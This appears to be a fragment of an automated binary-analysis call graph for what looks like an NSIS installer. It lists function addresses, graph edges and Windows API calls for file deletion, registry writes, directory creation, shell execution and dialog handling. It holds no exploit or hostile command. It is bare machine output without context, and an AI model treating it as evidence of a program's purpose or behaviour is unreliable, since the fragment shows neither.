3188->3193 3189->3104 3191 402e9f 3190->3191 3191->3181 3191->3189 3192 402c9b 6 API calls 3192->3195 3193->3189 3193->3193 3194 402f0f SetFilePointer 3193->3194 3194->3189 3195->3177 3195->3180 3195->3183 3195->3189 3195->3192 3197 4060b0 3 API calls 3196->3197 3198 40372e 3197->3198 3199 403734 3198->3199 3200 403746 3198->3200 3294 405c8d wsprintfW 3199->3294 3201 405c13 3 API calls 3200->3201 3202 403776 3201->3202 3204 403795 lstrcatW 3202->3204 3206 405c13 3 API calls 3202->3206 3205 403744 3204->3205 3285 4039f0 3205->3285 3206->3204 3209 4058b6 18 API calls 3210 4037c7 3209->3210 3211 40385b 3210->3211 3213 405c13 3 API calls 3210->3213 3212 4058b6 18 API calls 3211->3212 3214 403861 3212->3214 3215 4037f9 3213->3215 3216 403871 LoadImageW 3214->3216 3217 405d68 18 API calls 3214->3217 3215->3211 3221 40381a lstrlenW 3215->3221 3224 4057db CharNextW 3215->3224 3218 403917 3216->3218 3219 403898 RegisterClassW 3216->3219 3217->3216 3220 40140b 2 API calls 3218->3220 3222 4038ce SystemParametersInfoW CreateWindowExW 3219->3222 3249 403921 3219->3249 3223 40391d 3220->3223 3225 403828 lstrcmpiW 3221->3225 3226 40384e 3221->3226 3222->3218 3231 4039f0 19 API calls 3223->3231 3223->3249 3229 403817 3224->3229 3225->3226 3227 403838 GetFileAttributesW 3225->3227 3228 4057ae 3 API calls 3226->3228 3230 403844 3227->3230 3232 403854 3228->3232 3229->3221 3230->3226 3233 4057fa 2 API calls 3230->3233 3234 40392e 3231->3234 3295 405d46 lstrcpynW 3232->3295 3233->3226 3236 40393a ShowWindow LoadLibraryW 3234->3236 3237 4039bd 3234->3237 3239 403960 GetClassInfoW 3236->3239 3240 403959 LoadLibraryW 3236->3240 3238 4050cd 5 API calls 3237->3238 3241 4039c3 3238->3241 3242 403974 GetClassInfoW RegisterClassW 3239->3242 3243 40398a DialogBoxParamW 3239->3243 3240->3239 3244 4039c7 3241->3244 3245 4039df 3241->3245 3242->3243 3246 40140b 2 API calls 3243->3246 3248 40140b 2 API calls 3244->3248 3244->3249 3247 40140b 2 API calls 3245->3247 3246->3249 3247->3249 3248->3249 
3249->3107 3250->3096 3251->3140 3252->3110 3254 403658 3253->3254 3255 40364a CloseHandle 3253->3255 3297 403685 3254->3297 3255->3254 3258 4055d5 71 API calls 3259 40349f OleUninitialize 3258->3259 3259->3119 3259->3120 3260->3133 3261->3155 3263 401389 2 API calls 3262->3263 3264 401420 3263->3264 3264->3121 3266 405a0b GetTickCount GetTempFileNameW 3265->3266 3267 405a41 3266->3267 3268 4031db 3266->3268 3267->3266 3267->3268 3268->3098 3269->3170 3270->3172 3271->3176 3273 402ca4 3272->3273 3274 402cbc 3272->3274 3275 402cb4 3273->3275 3276 402cad DestroyWindow 3273->3276 3277 402cc4 3274->3277 3278 402ccc GetTickCount 3274->3278 3275->3179 3276->3275 3279 4060e9 2 API calls 3277->3279 3280 402cda CreateDialogParamW ShowWindow 3278->3280 3281 402cfd 3278->3281 3282 402cca 3279->3282 3280->3281 3281->3179 3282->3179 3283->3187 3284->3185 3286 403a04 3285->3286 3296 405c8d wsprintfW 3286->3296 3288 403a75 3289 405d68 18 API calls 3288->3289 3290 403a81 SetWindowTextW 3289->3290 3291 4037a5 3290->3291 3292 403a9d 3290->3292 3291->3209 3292->3291 3293 405d68 18 API calls 3292->3293 3293->3292 3294->3205 3295->3211 3296->3288 3298 403693 3297->3298 3299 40365d 3298->3299 3300 403698 FreeLibrary GlobalFree 3298->3300 3299->3258 3300->3299 3300->3300 3374 4023de 3385 402bda 3374->3385 3376 4023e8 3377 402ad0 18 API calls 3376->3377 3378 4023f1 3377->3378 3379 402729 3378->3379 3380 4023fc RegQueryValueExW 3378->3380 3381 40241c 3380->3381 3384 402422 RegCloseKey 3380->3384 3381->3384 3389 405c8d wsprintfW 3381->3389 3384->3379 3386 402ad0 18 API calls 3385->3386 3387 402bf3 3386->3387 3388 402c01 RegOpenKeyExW 3387->3388 3388->3376 3389->3384 3595 40165e 3596 402ad0 18 API calls 3595->3596 3597 401665 3596->3597 3598 402ad0 18 API calls 3597->3598 3599 40166e 3598->3599 3600 402ad0 18 API calls 3599->3600 3601 401677 MoveFileW 3600->3601 3602 401683 3601->3602 3603 40168a 3601->3603 3605 401423 25 API calls 3602->3605 3604 406089 2 API calls 3603->3604 3607 402195 
3603->3607 3606 401699 3604->3606 3605->3607 3606->3607 3608 405be0 40 API calls 3606->3608 3608->3602 3609 4040e3 lstrlenW 3610 404102 3609->3610 3611 404104 WideCharToMultiByte 3609->3611 3610->3611 3612 401ce5 GetDlgItem GetClientRect 3613 402ad0 18 API calls 3612->3613 3614 401d17 LoadImageW SendMessageW 3613->3614 3615 401d35 DeleteObject 3614->3615 3616 40295d 3614->3616 3615->3616 3617 4043e9 3618 4043f9 3617->3618 3619 40441f 3617->3619 3621 403f95 19 API calls 3618->3621 3620 403ffc 8 API calls 3619->3620 3622 40442b 3620->3622 3623 404406 SetDlgItemTextW 3621->3623 3623->3619 3624 40206a 3625 402ad0 18 API calls 3624->3625 3626 402071 3625->3626 3627 402ad0 18 API calls 3626->3627 3628 40207b 3627->3628 3629 402ad0 18 API calls 3628->3629 3630 402084 3629->3630 3631 402ad0 18 API calls 3630->3631 3632 40208e 3631->3632 3633 402ad0 18 API calls 3632->3633 3634 402098 3633->3634 3635 4020ac CoCreateInstance 3634->3635 3636 402ad0 18 API calls 3634->3636 3639 4020cb 3635->3639 3636->3635 3637 401423 25 API calls 3638 402195 3637->3638 3639->3637 3639->3638 3640 40156b 3641 401584 3640->3641 3642 40157b ShowWindow 3640->3642 3643 401592 ShowWindow 3641->3643 3644 40295d 3641->3644 3642->3641 3643->3644 3645 4024ec 3646 4024f1 3645->3646 3647 40250a 3645->3647 3648 402ab3 18 API calls 3646->3648 3649 402510 3647->3649 3650 40253c 3647->3650 3651 4024f8 3648->3651 3652 402ad0 18 API calls 3649->3652 3653 402ad0 18 API calls 3650->3653 3656 402565 WriteFile 3651->3656 3657 402729 3651->3657 3654 402517 WideCharToMultiByte lstrlenA 3652->3654 3655 402543 lstrlenW 3653->3655 3654->3651 3655->3651 3656->3657 3658 404f6e 3659 404f92 3658->3659 3660 404f7e 3658->3660 3663 404f9a IsWindowVisible 3659->3663 3669 404fb1 3659->3669 3661 404f84 3660->3661 3662 404fdb 3660->3662 3665 403fe1 SendMessageW 3661->3665 3664 404fe0 CallWindowProcW 3662->3664 3663->3662 3666 404fa7 3663->3666 3667 404f8e 3664->3667 3665->3667 3671 4048c4 SendMessageW 3666->3671 3669->3664 3676 
404944 3669->3676 3672 404923 SendMessageW 3671->3672 3673 4048e7 GetMessagePos ScreenToClient SendMessageW 3671->3673 3675 40491b 3672->3675 3674 404920 3673->3674 3673->3675 3674->3672 3675->3669 3685 405d46 lstrcpynW 3676->3685 3678 404957 3686 405c8d wsprintfW 3678->3686 3680 404961 3681 40140b 2 API calls 3680->3681 3682 40496a 3681->3682 3687 405d46 lstrcpynW 3682->3687 3684 404971 3684->3662 3685->3678 3686->3680 3687->3684 3688 4018ef 3689 401926 3688->3689 3690 402ad0 18 API calls 3689->3690 3691 40192b 3690->3691 3692 4055d5 71 API calls 3691->3692 3693 401934 3692->3693 3694 402571 3695 402ab3 18 API calls 3694->3695 3699 40257a 3695->3699 3696 4025c1 ReadFile 3696->3699 3704 402642 3696->3704 3697 4025fe ReadFile 3697->3699 3697->3704 3698 4025de MultiByteToWideChar 3698->3699 3699->3696 3699->3697 3699->3698 3700 402644 3699->3700 3701 402655 3699->3701 3699->3704 3705 405c8d wsprintfW 3700->3705 3703 402671 SetFilePointer 3701->3703 3701->3704 3703->3704 3705->3704 3706 4014f1 SetForegroundWindow 3707 40295d 3706->3707 3708 4018f2 3709 402ad0 18 API calls 3708->3709 3710 4018f9 3709->3710 3711 405529 MessageBoxIndirectW 3710->3711 3712 401902 3711->3712 3713 401df3 3714 402ad0 18 API calls 3713->3714 3715 401df9 3714->3715 3716 402ad0 18 API calls 3715->3716 3717 401e02 3716->3717 3718 402ad0 18 API calls 3717->3718 3719 401e0b 3718->3719 3720 402ad0 18 API calls 3719->3720 3721 401e14 3720->3721 3722 401423 25 API calls 3721->3722 3723 401e1b ShellExecuteW 3722->3723 3724 401e4c 3723->3724 3730 404976 GetDlgItem GetDlgItem 3731 4049c8 7 API calls 3730->3731 3740 404be1 3730->3740 3732 404a6b DeleteObject 3731->3732 3733 404a5e SendMessageW 3731->3733 3734 404a74 3732->3734 3733->3732 3735 404aab 3734->3735 3739 405d68 18 API calls 3734->3739 3737 403f95 19 API calls 3735->3737 3736 404cc5 3738 404d71 3736->3738 3748 404d1e SendMessageW 3736->3748 3769 404bd4 3736->3769 3741 404abf 3737->3741 3742 404d83 3738->3742 3743 404d7b SendMessageW 3738->3743 
3744 404a8d SendMessageW SendMessageW 3739->3744 3740->3736 3746 4048c4 5 API calls 3740->3746 3773 404c52 3740->3773 3747 403f95 19 API calls 3741->3747 3745 404dac 3742->3745 3751 404d95 ImageList_Destroy 3742->3751 3752 404d9c 3742->3752 3743->3742 3744->3734 3754 404f1b 3745->3754 3772 404944 4 API calls 3745->3772 3777 404de7 3745->3777 3746->3773 3753 404acd 3747->3753 3755 404d33 SendMessageW 3748->3755 3748->3769 3749 403ffc 8 API calls 3756 404f67 3749->3756 3750 404cb7 SendMessageW 3750->3736 3751->3752 3752->3745 3757 404da5 GlobalFree 3752->3757 3758 404ba2 GetWindowLongW SetWindowLongW 3753->3758 3766 404b1d SendMessageW 3753->3766 3768 404b9c 3753->3768 3770 404b59 SendMessageW 3753->3770 3771 404b6a SendMessageW 3753->3771 3759 404f2d ShowWindow GetDlgItem ShowWindow 3754->3759 3754->3769 3763 404d46 3755->3763 3757->3745 3760 404bbb 3758->3760 3759->3769 3761 404bc1 ShowWindow 3760->3761 3762 404bd9 3760->3762 3781 403fca SendMessageW 3761->3781 3782 403fca SendMessageW 3762->3782 3767 404d57 SendMessageW 3763->3767 3766->3753 3767->3738 3768->3758 3768->3760 3769->3749 3770->3753 3771->3753 3772->3777 3773->3736 3773->3750 3774 404ef1 InvalidateRect 3774->3754 3775 404f07 3774->3775 3783 4047de 3775->3783 3776 404e15 SendMessageW 3780 404e2b 3776->3780 3777->3776 3777->3780 3779 404e9f SendMessageW SendMessageW 3779->3780 3780->3774 3780->3779 3781->3769 3782->3740 3784 4047fb 3783->3784 3785 405d68 18 API calls 3784->3785 3786 404830 3785->3786 3787 405d68 18 API calls 3786->3787 3788 40483b 3787->3788 3789 405d68 18 API calls 3788->3789 3790 40486c lstrlenW wsprintfW SetDlgItemTextW 3789->3790 3790->3754 3791 404778 3792 4047a4 3791->3792 3793 404788 3791->3793 3795 4047d7 3792->3795 3796 4047aa SHGetPathFromIDListW 3792->3796 3802 40550d GetDlgItemTextW 3793->3802 3798 4047c1 SendMessageW 3796->3798 3799 4047ba 3796->3799 3797 404795 SendMessageW 3797->3792 3798->3795 3800 40140b 2 API calls 3799->3800 3800->3798 3802->3797 3803 4014ff 3804 
401507 3803->3804 3806 40151a 3803->3806 3805 402ab3 18 API calls 3804->3805 3805->3806 3807 401000 3808 401037 BeginPaint GetClientRect 3807->3808 3809 40100c DefWindowProcW 3807->3809 3811 4010f3 3808->3811 3812 401179 3809->3812 3813 401073 CreateBrushIndirect FillRect DeleteObject 3811->3813 3814 4010fc 3811->3814 3813->3811 3815 401102 CreateFontIndirectW 3814->3815 3816 401167 EndPaint 3814->3816 3815->3816 3817 401112 6 API calls 3815->3817 3816->3812 3817->3816 3818 401a00 3819 402ad0 18 API calls 3818->3819 3820 401a09 ExpandEnvironmentStringsW 3819->3820 3821 401a1d 3820->3821 3823 401a30 3820->3823 3822 401a22 lstrcmpW 3821->3822 3821->3823 3822->3823 3824 401b01 3825 402ad0 18 API calls 3824->3825 3826 401b08 3825->3826 3827 402ab3 18 API calls 3826->3827 3828 401b11 wsprintfW 3827->3828 3829 40295d 3828->3829 3830 402706 3831 402ad0 18 API calls 3830->3831 3832 40270d FindFirstFileW 3831->3832 3833 402720 3832->3833 3834 402735 3832->3834 3838 405c8d wsprintfW 3834->3838 3836 40273e 3839 405d46 lstrcpynW 3836->3839 3838->3836 3839->3833 2852 401f08 2853 402ad0 18 API calls 2852->2853 2854 401f0f GetFileVersionInfoSizeW 2853->2854 2855 401f36 GlobalAlloc 2854->2855 2856 40295d 2854->2856 2855->2856 2857 401f4a 2855->2857 2858 401f8c 2857->2858 2862 405c8d wsprintfW 2857->2862 2858->2856 2860 401f7e 2863 405c8d wsprintfW 2860->2863 2862->2860 2863->2858 3840 401c8e 3841 402ab3 18 API calls 3840->3841 3842 401c94 IsWindow 3841->3842 3843 4019f0 3842->3843 3844 40268f 3845 402696 3844->3845 3848 402908 3844->3848 3846 402ab3 18 API calls 3845->3846 3847 4026a1 3846->3847 3849 4026a8 SetFilePointer 3847->3849 3849->3848 3850 4026b8 3849->3850 3852 405c8d wsprintfW 3850->3852 3852->3848 3853 401491 3854 404ffa 25 API calls 3853->3854 3855 401498 3854->3855 2969 402293 2970 402ad0 18 API calls 2969->2970 2971 4022a2 2970->2971 2972 402ad0 18 API calls 2971->2972 2973 4022ab 2972->2973 2974 402ad0 18 API calls 2973->2974 2975 4022b5 GetPrivateProfileStringW 
2974->2975 3856 402c15 3857 402c40 3856->3857 3858 402c27 SetTimer 3856->3858 3859 402c95 3857->3859 3860 402c5a MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3857->3860 3858->3857 3860->3859 3861 401718 3862 402ad0 18 API calls 3861->3862 3863 40171f SearchPathW 3862->3863 3864 40173a 3863->3864 3865 401f98 3866 40205c 3865->3866 3867 401faa 3865->3867 3870 401423 25 API calls 3866->3870 3868 402ad0 18 API calls 3867->3868 3869 401fb1 3868->3869 3871 402ad0 18 API calls 3869->3871 3876 402195 3870->3876 3872 401fba 3871->3872 3873 401fd0 LoadLibraryExW 3872->3873 3874 401fc2 GetModuleHandleW 3872->3874 3873->3866 3875 401fe1 3873->3875 3874->3873 3874->3875 3885 40611c WideCharToMultiByte 3875->3885 3879 401ff2 3882 401423 25 API calls 3879->3882 3883 402002 3879->3883 3880 40202b 3881 404ffa 25 API calls 3880->3881 3881->3883 3882->3883 3883->3876 3884 40204e FreeLibrary 3883->3884 3884->3876 3886 406146 GetProcAddress 3885->3886 3887 401fec 3885->3887 3886->3887 3887->3879 3887->3880 3081 40159b 3082 402ad0 18 API calls 3081->3082 3083 4015a2 SetFileAttributesW 3082->3083 3084 4015b4 3083->3084 3888 40149e 3889 40223c 3888->3889 3890 4014ac PostQuitMessage 3888->3890 3890->3889 3891 40219e 3892 402ad0 18 API calls 3891->3892 3893 4021a4 3892->3893 3894 402ad0 18 API calls 3893->3894 3895 4021ad 3894->3895 3896 402ad0 18 API calls 3895->3896 3897 4021b6 3896->3897 3898 406089 2 API calls 3897->3898 3899 4021bf 3898->3899 3900 4021d0 lstrlenW lstrlenW 3899->3900 3901 4021c3 3899->3901 3903 404ffa 25 API calls 3900->3903 3902 404ffa 25 API calls 3901->3902 3905 4021cb 3901->3905 3902->3905 3904 40220e SHFileOperationW 3903->3904 3904->3901 3904->3905 3906 401b22 3907 401b73 3906->3907 3908 401b2f 3906->3908 3910 401b78 3907->3910 3911 401b9d GlobalAlloc 3907->3911 3909 402229 3908->3909 3915 401b46 3908->3915 3912 405d68 18 API calls 3909->3912 3921 401bb8 3910->3921 3927 405d46 lstrcpynW 3910->3927 3913 405d68 18 API calls 3911->3913 3914 402236 3912->3914 
3913->3921 3920 405529 MessageBoxIndirectW 3914->3920 3925 405d46 lstrcpynW 3915->3925 3918 401b8a GlobalFree 3918->3921 3919 401b55 3926 405d46 lstrcpynW 3919->3926 3920->3921 3923 401b64 3928 405d46 lstrcpynW 3923->3928 3925->3919 3926->3923 3927->3918 3928->3921 3929 402222 3930 402229 3929->3930 3932 40223c 3929->3932 3931 405d68 18 API calls 3930->3931 3933 402236 3931->3933 3934 405529 MessageBoxIndirectW 3933->3934 3934->3932 2665 401924 2666 401926 2665->2666 2671 402ad0 2666->2671 2672 402adc 2671->2672 2718 405d68 2672->2718 2675 40192b 2677 4055d5 2675->2677 2757 4058b6 2677->2757 2680 405614 2683 405755 2680->2683 2771 405d46 lstrcpynW 2680->2771 2681 4055fd DeleteFileW 2682 401934 2681->2682 2683->2682 2801 406089 FindFirstFileW 2683->2801 2685 40563a 2686 405640 lstrcatW 2685->2686 2687 40564d 2685->2687 2689 405653 2686->2689 2772 4057fa lstrlenW 2687->2772 2692 405663 lstrcatW 2689->2692 2693 405659 2689->2693 2695 40566e lstrlenW FindFirstFileW 2692->2695 2693->2692 2693->2695 2694 405773 2804 4057ae lstrlenW CharPrevW 2694->2804 2696 40574a 2695->2696 2716 405691 2695->2716 2696->2683 2698 4057db CharNextW 2698->2716 2700 40558d 5 API calls 2701 405785 2700->2701 2702 405789 2701->2702 2703 40579f 2701->2703 2702->2682 2708 404ffa 25 API calls 2702->2708 2704 404ffa 25 API calls 2703->2704 2704->2682 2705 405729 FindNextFileW 2707 405741 FindClose 2705->2707 2705->2716 2707->2696 2709 405796 2708->2709 2711 405be0 40 API calls 2709->2711 2712 40579d 2711->2712 2712->2682 2713 4055d5 64 API calls 2713->2716 2714 404ffa 25 API calls 2714->2705 2716->2698 2716->2705 2716->2713 2716->2714 2776 405d46 lstrcpynW 2716->2776 2777 40558d 2716->2777 2785 404ffa 2716->2785 2796 405be0 2716->2796 2722 405d75 2718->2722 2719 405fc0 2720 402afd 2719->2720 2752 405d46 lstrcpynW 2719->2752 2720->2675 2736 405fda 2720->2736 2722->2719 2723 405e28 GetVersion 2722->2723 2724 405f8e lstrlenW 2722->2724 2727 405d68 10 API calls 2722->2727 2729 405ea3 
GetSystemDirectoryW 2722->2729 2730 405eb6 GetWindowsDirectoryW 2722->2730 2731 405fda 5 API calls 2722->2731 2732 405d68 10 API calls 2722->2732 2733 405f2f lstrcatW 2722->2733 2734 405eea SHGetSpecialFolderLocation 2722->2734 2745 405c13 RegOpenKeyExW 2722->2745 2750 405c8d wsprintfW 2722->2750 2751 405d46 lstrcpynW 2722->2751 2723->2722 2724->2722 2727->2724 2729->2722 2730->2722 2731->2722 2732->2722 2733->2722 2734->2722 2735 405f02 SHGetPathFromIDListW CoTaskMemFree 2734->2735 2735->2722 2742 405fe7 2736->2742 2737 40605d 2738 406062 CharPrevW 2737->2738 2741 406083 2737->2741 2738->2737 2739 406050 CharNextW 2739->2737 2739->2742 2741->2675 2742->2737 2742->2739 2743 40603c CharNextW 2742->2743 2744 40604b CharNextW 2742->2744 2753 4057db 2742->2753 2743->2742 2744->2739 2746 405c87 2745->2746 2747 405c47 RegQueryValueExW 2745->2747 2746->2722 2748 405c68 RegCloseKey 2747->2748 2748->2746 2750->2722 2751->2722 2752->2720 2754 4057e1 2753->2754 2755 4057f7 2754->2755 2756 4057e8 CharNextW 2754->2756 2755->2742 2756->2754 2807 405d46 lstrcpynW 2757->2807 2759 4058c7 2808 405859 CharNextW CharNextW 2759->2808 2762 4055f5 2762->2680 2762->2681 2763 405fda 5 API calls 2769 4058dd 2763->2769 2764 40590e lstrlenW 2765 405919 2764->2765 2764->2769 2767 4057ae 3 API calls 2765->2767 2766 406089 2 API calls 2766->2769 2768 40591e GetFileAttributesW 2767->2768 2768->2762 2769->2762 2769->2764 2769->2766 2770 4057fa 2 API calls 2769->2770 2770->2764 2771->2685 2773 405808 2772->2773 2774 40581a 2773->2774 2775 40580e CharPrevW 2773->2775 2774->2689 2775->2773 2775->2774 2776->2716 2814 4059aa GetFileAttributesW 2777->2814 2780 4055ba 2780->2716 2781 4055b0 DeleteFileW 2783 4055b6 2781->2783 2782 4055a8 RemoveDirectoryW 2782->2783 2783->2780 2784 4055c6 SetFileAttributesW 2783->2784 2784->2780 2786 4050b7 2785->2786 2788 405015 2785->2788 2786->2716 2787 405031 lstrlenW 2790 40505a 2787->2790 2791 40503f lstrlenW 2787->2791 2788->2787 2789 405d68 18 API calls 2788->2789 
2789->2787 2793 405060 SetWindowTextW 2790->2793 2794 40506d 2790->2794 2791->2786 2792 405051 lstrcatW 2791->2792 2792->2790 2793->2794 2794->2786 2795 405073 SendMessageW SendMessageW SendMessageW 2794->2795 2795->2786 2817 4060b0 GetModuleHandleA 2796->2817 2800 405c08 2800->2716 2802 40576f 2801->2802 2803 40609f FindClose 2801->2803 2802->2682 2802->2694 2803->2802 2805 405779 2804->2805 2806 4057ca lstrcatW 2804->2806 2805->2700 2806->2805 2807->2759 2809 405876 2808->2809 2812 405888 2808->2812 2811 405883 CharNextW 2809->2811 2809->2812 2810 4058ac 2810->2762 2810->2763 2811->2810 2812->2810 2813 4057db CharNextW 2812->2813 2813->2812 2815 405599 2814->2815 2816 4059bc SetFileAttributesW 2814->2816 2815->2780 2815->2781 2815->2782 2816->2815 2818 4060d7 GetProcAddress 2817->2818 2819 4060cc LoadLibraryA 2817->2819 2820 405be7 2818->2820 2819->2818 2819->2820 2820->2800 2821 405a52 lstrcpyW 2820->2821 2822 405aa1 GetShortPathNameW 2821->2822 2823 405a7b 2821->2823 2824 405ab6 2822->2824 2825 405bda 2822->2825 2845 4059cf GetFileAttributesW CreateFileW 2823->2845 2824->2825 2827 405abe wsprintfA 2824->2827 2825->2800 2829 405d68 18 API calls 2827->2829 2828 405a85 CloseHandle GetShortPathNameW 2828->2825 2830 405a99 2828->2830 2831 405ae6 2829->2831 2830->2822 2830->2825 2846 4059cf GetFileAttributesW CreateFileW 2831->2846 2833 405af3 2833->2825 2834 405b02 GetFileSize GlobalAlloc 2833->2834 2835 405bd3 CloseHandle 2834->2835 2836 405b24 ReadFile 2834->2836 2835->2825 2836->2835 2837 405b3c 2836->2837 2837->2835 2847 405934 lstrlenA 2837->2847 2840 405b55 lstrcpyA 2843 405b77 2840->2843 2841 405b69 2842 405934 4 API calls 2841->2842 2842->2843 2844 405bae SetFilePointer WriteFile GlobalFree 2843->2844 2844->2835 2845->2828 2846->2833 2848 405975 lstrlenA 2847->2848 2849 40594e lstrcmpiA 2848->2849 2851 40597d 2848->2851 2850 40596c CharNextA 2849->2850 2849->2851 2850->2848 2851->2840 2851->2841 3935 4040a9 lstrcpynW lstrlenW 3936 401cab 3937 402ab3 18 API 
calls 3936->3937 3938 401cb2 3937->3938 3939 402ab3 18 API calls 3938->3939 3940 401cba GetDlgItem 3939->3940 3941 4024e6 3940->3941 3942 40232f 3943 402335 3942->3943 3944 402ad0 18 API calls 3943->3944 3945 402347 3944->3945 3946 402ad0 18 API calls 3945->3946 3947 402351 RegCreateKeyExW 3946->3947 3948 40237b 3947->3948 3949 402729 3947->3949 3950 402396 3948->3950 3951 402ad0 18 API calls 3948->3951 3952 4023a2 3950->3952 3954 402ab3 18 API calls 3950->3954 3953 40238c lstrlenW 3951->3953 3955 4023bd RegSetValueExW 3952->3955 3956 402f38 33 API calls 3952->3956 3953->3950 3954->3952 3957 4023d3 RegCloseKey 3955->3957 3956->3955 3957->3949 3959 4016af 3960 402ad0 18 API calls 3959->3960 3961 4016b5 GetFullPathNameW 3960->3961 3962 4016cf 3961->3962 3968 4016f1 3961->3968 3965 406089 2 API calls 3962->3965 3962->3968 3963 401706 GetShortPathNameW 3964 40295d 3963->3964 3966 4016e1 3965->3966 3966->3968 3969 405d46 lstrcpynW 3966->3969 3968->3963 3968->3964 3969->3968 3970 404430 3971 40445c 3970->3971 3972 40446d 3970->3972 4031 40550d GetDlgItemTextW 3971->4031 3974 404479 GetDlgItem 3972->3974 4007 4044d8 3972->4007 3976 40448d 3974->3976 3975 404467 3978 405fda 5 API calls 3975->3978 3980 4044a1 SetWindowTextW 3976->3980 3986 405859 4 API calls 3976->3986 3977 4045bc 3981 40475d 3977->3981 4033 40550d GetDlgItemTextW 3977->4033 3978->3972 3984 403f95 19 API calls 3980->3984 3985 403ffc 8 API calls 3981->3985 3982 405d68 18 API calls 3987 40454c SHBrowseForFolderW 3982->3987 3983 4045ec 3988 4058b6 18 API calls 3983->3988 3989 4044bd 3984->3989 3990 404771 3985->3990 3991 404497 3986->3991 3987->3977 3992 404564 CoTaskMemFree 3987->3992 3993 4045f2 3988->3993 3994 403f95 19 API calls 3989->3994 3991->3980 3997 4057ae 3 API calls 3991->3997 3995 4057ae 3 API calls 3992->3995 4034 405d46 lstrcpynW 3993->4034 3996 4044cb 3994->3996 3998 404571 3995->3998 4032 403fca SendMessageW 3996->4032 3997->3980 4001 4045a8 SetDlgItemTextW 3998->4001 4006 405d68 18 API calls 
3998->4006 4001->3977 4002 4044d1 4004 4060b0 3 API calls 4002->4004 4003 404609 4005 4060b0 3 API calls 4003->4005 4004->4007 4014 404611 4005->4014 4008 404590 lstrcmpiW 4006->4008 4007->3977 4007->3981 4007->3982 4008->4001 4011 4045a1 lstrcatW 4008->4011 4009 404650 4035 405d46 lstrcpynW 4009->4035 4011->4001 4012 404657 4013 405859 4 API calls 4012->4013 4015 40465d GetDiskFreeSpaceW 4013->4015 4014->4009 4017 4057fa 2 API calls 4014->4017 4019 4046a2 4014->4019 4018 404680 MulDiv 4015->4018 4015->4019 4017->4014 4018->4019 4020 40470c 4019->4020 4021 4047de 21 API calls 4019->4021 4022 40472f 4020->4022 4024 40140b 2 API calls 4020->4024 4023 4046fe 4021->4023 4036 403fb7 KiUserCallbackDispatcher 4022->4036 4026 404703 4023->4026 4027 40470e SetDlgItemTextW 4023->4027 4024->4022 4029 4047de 21 API calls 4026->4029 4027->4020 4028 40474b 4028->3981 4037 4043c5 4028->4037 4029->4020 4031->3975 4032->4002 4033->3983 4034->4003 4035->4012 4036->4028 4038 4043d3 4037->4038 4039 4043d8 SendMessageW 4037->4039 4038->4039 4039->3981 4040 404132 4041 40414a 4040->4041 4048 404264 4040->4048 4045 403f95 19 API calls 4041->4045 4042 4042ce 4043 4043a0 4042->4043 4044 4042d8 GetDlgItem 4042->4044 4050 403ffc 8 API calls 4043->4050 4046 404361 4044->4046 4047 4042f2 4044->4047 4049 4041b1 4045->4049 4046->4043 4055 404373 4046->4055 4047->4046 4054 404318 6 API calls 4047->4054 4048->4042 4048->4043 4051 40429f GetDlgItem SendMessageW 4048->4051 4053 403f95 19 API calls 4049->4053 4062 40439b 4050->4062 4071 403fb7 KiUserCallbackDispatcher 4051->4071 4057 4041be CheckDlgButton 4053->4057 4054->4046 4058 404389 4055->4058 4059 404379 SendMessageW 4055->4059 4056 4042c9 4060 4043c5 SendMessageW 4056->4060 4069 403fb7 KiUserCallbackDispatcher 4057->4069 4058->4062 4063 40438f SendMessageW 4058->4063 4059->4058 4060->4042 4063->4062 4064 4041dc GetDlgItem 4070 403fca SendMessageW 4064->4070 4066 4041f2 SendMessageW 4067 404218 SendMessageW SendMessageW lstrlenW SendMessageW 
SendMessageW 4066->4067 4068 40420f GetSysColor 4066->4068 4067->4062 4068->4067 4069->4064 4070->4066 4071->4056 4072 402938 SendMessageW 4073 402952 InvalidateRect 4072->4073 4074 40295d 4072->4074 4073->4074 4075 4014b8 4076 4014be 4075->4076 4077 401389 2 API calls 4076->4077 4078 4014c6 4077->4078 2976 4015b9 2977 402ad0 18 API calls 2976->2977 2978 4015c0 2977->2978 2979 405859 4 API calls 2978->2979 2986 4015c9 2979->2986 2980 401614 2981 401646 2980->2981 2982 401619 2980->2982 2989 401423 25 API calls 2981->2989 2994 401423 2982->2994 2983 4057db CharNextW 2984 4015d7 CreateDirectoryW 2983->2984 2984->2986 2987 4015ed GetLastError 2984->2987 2986->2980 2986->2983 2987->2986 2990 4015fa GetFileAttributesW 2987->2990 2993 40163e 2989->2993 2990->2986 2992 40162d SetCurrentDirectoryW 2992->2993 2995 404ffa 25 API calls 2994->2995 2996 401431 2995->2996 2997 405d46 lstrcpynW 2996->2997 2997->2992 2998 405139 2999 4052e5 2998->2999 3000 40515a GetDlgItem GetDlgItem GetDlgItem 2998->3000 3001 4052ee GetDlgItem CreateThread CloseHandle 2999->3001 3003 405316 2999->3003 3044 403fca SendMessageW 3000->3044 3001->3003 3067 4050cd OleInitialize 3001->3067 3005 405363 3003->3005 3006 40532d ShowWindow ShowWindow 3003->3006 3007 405341 3003->3007 3004 4051cb 3009 4051d2 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3004->3009 3053 403ffc 3005->3053 3049 403fca SendMessageW 3006->3049 3008 40539f 3007->3008 3011 405352 3007->3011 3012 405378 ShowWindow 3007->3012 3008->3005 3016 4053aa SendMessageW 3008->3016 3014 405241 3009->3014 3015 405225 SendMessageW SendMessageW 3009->3015 3050 403f6e 3011->3050 3019 405398 3012->3019 3020 40538a 3012->3020 3022 405254 3014->3022 3023 405246 SendMessageW 3014->3023 3015->3014 3018 405371 3016->3018 3024 4053c3 CreatePopupMenu 3016->3024 3021 403f6e SendMessageW 3019->3021 3025 404ffa 25 API calls 3020->3025 3021->3008 3045 403f95 3022->3045 3023->3022 3026 405d68 18 API calls 3024->3026 3025->3019 3028 4053d3 
